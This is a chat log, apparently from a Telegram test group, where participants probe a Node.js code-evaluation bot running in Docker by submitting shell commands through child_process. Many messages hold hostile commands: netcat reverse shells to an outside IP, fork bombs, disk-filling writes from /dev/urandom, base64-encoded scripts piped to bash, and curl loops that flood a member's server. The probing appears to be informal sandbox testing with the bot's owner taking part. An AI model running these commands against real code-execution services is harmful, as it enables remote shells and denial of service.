Jump to...
redirecting...

Log for SITCON BOT Testpool

....
抱歉 剛剛給錯 token...
可以幫忙加 telegram.me/nodeCodeEvaluatingBot 嗎?感恩
怎麼不自己拉?
/1
same
不會拉
先關掉 不然會洗ww
/ help (X
["apple", "banana"].forEach((entry) => {console.log(entry)})
/evaluate ["apple", "banana"].forEach((entry) => {console.log(entry)})
/hi
........
/evaluate installModule("request", () => { require("request")('http://www.google.com', (error, response, body) => { if (!error && response.statusCode == 200) { console.log(body); } }); });
same
same
same
same
same
same
/evaluate installModule("request", () => { require("request")('http://ipinfo.io', (error, response, body) => { if (!error && response.statusCode == 200) { console.log(body); } }); });
超讚der
installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat run.js'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
@BirkhoffLee 記得限制使用的資源量
還有 nice 值 (優先權)
等下
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cd ..; ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'pwd; cd ..; ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'whois; id'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'uname -a'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cd ..; uptime'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /proc/version'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
重開
在docker裡面啊._.
y
/evaluatequiet installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cd ..; uptime'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'lscpu'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'df -h'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo $SHELL'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
用 /evaluateaquiet 會比較安靜w
@BirkhoffLee 我可以壓力測試嗎 (?
....
先不要
我還在改東西
installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom > /tmp/ file.iso'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
這應該會炸
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ping srv.seadog007.me &'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ps'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
重開
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ping -c 50 srv.seadog007.me &'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ps -aux'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluatequiet return 0
same
/evaluatequiet console.log("123");return 0
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/bash 59.127.163.155 12345 &'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/bash 59.127.163.155 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/sh 59.127.163.155 12345 &'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo a | nc srv.seadog007.me 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
ps aux 就好,不用 -
重開
/evaluatequiet return 0
好了沒問題惹
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls /bin'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'wget http://srv.seadog007.me/test.html'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'head -c1000 /dev/urandom'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls /tmp'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
先等我丟到digitalocean
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'df'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
阿幹你tee當然要看一下啊
-h 啦 (?
/etc/hosts
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/bash 59.127.163.155 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'df -h'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'df -h'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /dev/urandom |tee a b c d e'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'df -h'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
same
same
same
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install sqlmap'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo a > /tmp'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo a > /tmp/a'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ls /tmp'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'cat /etc/hosts'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'wget http://srv.seadog007.me/test.html; cat test.html'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install gcc make; gcc'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install htop; htop'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
感覺好肥
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = ':(){ :|:& };: '; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ps auz'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'ps aux'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = ':(){ :|:& }; :; echo done'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
/evaluatequirt installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install docker'; exec(cmd, function(error, stdout, stderr) { console.log(stdout)});});
same
/evaluatequiet installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install docker'; exec(cmd, function(error, stdout, stderr) { console.log(stdout)});});
幹你走開
真的
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = ':(){ :|:& }; while :; do :; done'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
找到bug了,重開
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = ':(){ :|:& };: '; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'while true; do echo 1»/tmp/a; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
same
same
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'bash -c ":(){ :|:& }; while :; do :; done"'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
same
腦殘TG
/evaluatequiRRRRt installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install docker'; exec(cmd, function(error, stdout, stderr) { console.log(stdout)});});
/evaluatequiet installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'apt-get install docker'; exec(cmd, function(error, stdout, stderr) { console.log(stdout)});});
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'while true; do curl http://srv.seadog007.me/test.html; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
- -掛掉了
aths: 0x36850aa74301 <JS Array[7]>@0x36850aa74301 #250# 0x3a0e80775ec9: 0x3a0e80775ec9 <a Module> id: 0x30761a8ac09 <String[68]: /usr/local/lib/node_modules/coffee-script/lib/coffee-script/lexer.js> exports: 0x3a0e80779489 <an Object>@0x3a0e80779489 parent: 0x3a0e807483d9 <a Module>#210# filename: 0x30761a8ac09 <String[68]: /usr/local/lib/node_modules/coffee-script/lib/coffee-script/lexer.js> loaded: 0x18e25704141 <true> children: 0x3a0e807794a1 <JS Array[1]>@0x3a0e807794a1 paths: 0x3a0e807794c1 <JS Array[7]>@0x3a0e807794c1 #251# 0x3a0e8077fb91: 0x3a0e8077fb91 <a Module> id: 0x30761a9e099 <String[69]: /usr/local/lib/node_modules/coffee-script/lib/coffee-script/parser.js> exports: 0x3a0e80778721 <an Object>@0x3a0e80778721 parent: 0x3a0e807483d9 <a Module>#210# filename: 0x30761a9e099 <String[69]: /usr/lerror: Forever detected script was killed by signal: SIGTRAP error: Script restart attempt #4 FATAL ERROR: Evacuation Allocation failed - process out of memory error: Forever detected script was killed by signal: SIGABRT error: Script restart attempt #5 FATAL ERROR: Evacuation Allocation failed - process out of memory error: Forever detected script was killed by signal: SIGABRT error: Script restart attempt #6 FATAL ERROR: Evacuation Allocation failed - process out of memory error: Forever detected script was killed by signal: SIGABRT error: Script restart attempt #7 FATAL ERROR: Evacuation Allocation failed - process out of memory error: Forever detected script was killed by signal: SIGABRT
same
好喔www
out of memory
不是這個吧..
可能是
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'while true; do curl http://srv.seadog007.me/test.html; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
整個 memory 都噴出來了 不知道
@BirkhoffLee 試試看是不是
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'bash -c ":(){ :|:& }; while :; do :; done"'; exec(cmd, function(e) {}); });
/evaluate
好像爆炸了
只要打開就會爆炸- -
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'bash -c ":(){ :|:& }; while :; do :; done"'; exec(cmd, function(e) {}); });
不是
WARNING: Your kernel does not support swap limit capabilities, memory limited without swap. [ { model: 'Intel(R) Xeon(R) CPU E5-2630L v2 @ 2.40GHz', speed: 2399, times: { user: 13336300, nice: 999500, sys: 6860100, idle: 955976400, irq: 0 } } ] ** Script execution ended with code 0 **
@BirkhoffLee 這是Linode
no
do
DO哪裡
怎麼會是Low Power CPU
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'while true; do curl http://srv.seadog007.me/test.html; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
那個不用install阿
忘記了 怎麼看
child_process是
內建的
SGP1 這個嗎w
那是哪裡
新加坡
啊 DO新加坡新一批主機是Low Power的啊
真省錢
will
@BirkhoffLee 他在DoS我的主機了www
wwww
120秒之後會停
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'bash -c ":(){ :|:& }; while :; do :; done"'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=date '+%s%N' | cut -b1-13; c=0; while true; do i=$(($c + 1)); s=$((date '+%s%N' | cut -b1-13 - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
噴?
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=date '+%s%N' | cut -b1-13; c=0; while true; do i=$(($c + 1)); s=$((date '+%s%N' | cut -b1-13 - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
幹XD
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=$((date '+%s%N' | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date '+%s%N' | cut -b1-13)) - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=$((date '+\%s\%N' | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date '+\%s\%N' | cut -b1-13)) - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=$((date "+%s%N" | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date "+%s%N" | cut -b1-13)) - $initdate));curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=date '+%s%N' | cut -b1-13; c=0; while true; do i=$(($c + 1)); s=$((date '+%s%N' | cut -b1-13 - $initdate));curl "http://1.34.37.206/$s?c=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
真會抄(?
就跟你說child_process不用install
/evaluate var exec = require('child_process').exec; var cmd = 'initdate=$((date "+%s%N" | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date "+%s%N" | cut -b1-13)) - $initdate)); curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });
直接require('child_process')就好
/evaluate
Sprry XD
然後他不會執行
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=$((date "+%s%N" | cut -b1-13)); c=0; while true; do i=$(($c + 1)); s=$(($((date "+%s%N" | cut -b1-13)) - $initdate)); curl "http://srv.seadog007.me/test.html?c=$c&s=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
XDDDDDDDDDDDDDDDDDDDDDD
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9JCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpOyBjPTA7IHdoaWxlIHRydWU7IGRvIGk9JCgoJGMgKyAxKSk7IHM9JCgoJCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpIC0gJGluaXRkYXRlKSk7IGN1cmwgImh0dHA6Ly9zcnYuc2VhZG9nMDA3Lm1lL3Rlc3QuaHRtbD9jPSRjJnM9JHMiICY7IGRvbmU=" | base64 —decode | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
我乾脆直接把他改成bash bot就好了阿 省得你們一直spawn..XD
/evaluate var os = require('os'); console.log(os.cpus()[0].model); console.log(os.loadavg()); console.log(os.networkInterfaces());
same
誒不能pipe喔
煩躁
@seadog007 明明就可以
喔幹 又被坑
一直被TG坑啊
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9JCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpOyBjPTA7IHdoaWxlIHRydWU7IGRvIGk9JCgoJGMgKyAxKSk7IHM9JCgoJCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpIC0gJGluaXRkYXRlKSk7IGN1cmwgImh0dHA6Ly9zcnYuc2VhZG9nMDA3Lm1lL3Rlc3QuaHRtbD9jPSRjJnM9JHMiICY7IGRvbmU=" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
乾脆做一隻 Container BOT
wwwwwww
你在這裡沒有發言權w
@S_ean 關掉甘霖老私
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9JCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpDQpjPTANCndoaWxlIHRydWUNCmRvDQppPSQoKCRjICsgMSkpDQpzPSQoKCQoKGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTMpKSAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQpkb25l" | base64 —decode | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
真的阿 但是不要
我才沒資源
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9JCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpDQpjPTANCndoaWxlIHRydWUNCmRvDQppPSQoKCRjICsgMSkpDQpzPSQoKCQoKGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTMpKSAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
做 Container BOT 然後分配給大家
給你們用你們一定又要用到整個Memory stack 噴出來才甘願
a
就有人喜歡去戳漏洞
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'date "+%s%N" | cut -b1-13'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
好玩的心態都不改
不是說了 child_process 不用 install
那你還不趕快去寫踢喵
我在整理 Tocas
隨便
他不理我啊
....
難過
我要做個隨便 BOT
/evaluatequiet var exec = require('child_process').exec; var cmd = 'date "+%s%N" | cut -b1-13'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9JCgoZGF0ZSAiKyVzJU4iIHwgY3V0IC1iMS0xMykpDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
可以阿.-.
same
沒差啦._.
.=.
/evaluate 1+1
他可以 alert 嗎
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
這是node不是browser-side javascript .-.
/evaluate alert('Hello')
same
你要 console.log 阿 。-。
他會 show console 喔
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvICRjJiRzDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
/evaluate console.log(alert('Hello'))
好了
same
done錯在哪TAT
就說沒有alert 你當他瀏覽器喔
QQ
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIg0KZWNobyAkYyYkcw0KZG9uZQ==" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
搞不好程式送進去都是 inline
same
wwwwww
container = spawn 'docker', ['run', '--name', containerName, '--rm', '--memory="40m"', 'node', 'bash', '-c', 'cd /home; echo ' + new Buffer(code).toString('base64') + ' | base64 --decode > ./run.js; node ./run.js']
code 這樣送的
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIg0KZWNobyAkYyYkcw==" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
same
container = spawn 'docker', ['run', '--name', containerName, '--rm', 'node', 'bash', '-c', 'cd /home; echo ' + new Buffer(code).toString('base64') + ' | base64 --decode > ./run.js; node ./run.js']
這樣才對
所以說done哪裡錯QQ
bash: line 9: syntax error near unexpected token `done' bash: line 9: `done'
我不會shell script XD
@BirkhoffLee 你用過 React 嗎
y
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
fuck you
不理我了喔._.
不知道
我重開了 你再一次
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo a'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
/evaluate console.log("asda")
死了喔
....
wtf
弱弱的(?
log看起來沒問題啊
我跑之前就死了
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
爆炸
我重開一下
same
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo "aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l" | base64 -d | bash'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});
/evaluate console.log(installModule)
真的爆炸了
same
same
喔好
same
same
same
same
same
它可能被do限制資源或者被tg限制了一下(?
aW5pdGRhdGU9YGRhdGUgIislcyVOIiB8IGN1dCAtYjEtMTNgDQpjPTANCndoaWxlIHRydWUNCmRvDQpjPSQoKCRjICsgMSkpDQpzPSQoKGBkYXRlICIrJXMlTiIgfCBjdXQgLWIxLTEzYCAtICRpbml0ZGF0ZSkpDQpjdXJsICJodHRwOi8vc3J2LnNlYWRvZzAwNy5tZS90ZXN0Lmh0bWw/Yz0kYyZzPSRzIiAmDQplY2hvIC1lICIkY1x0JHMiDQpkb25l
same
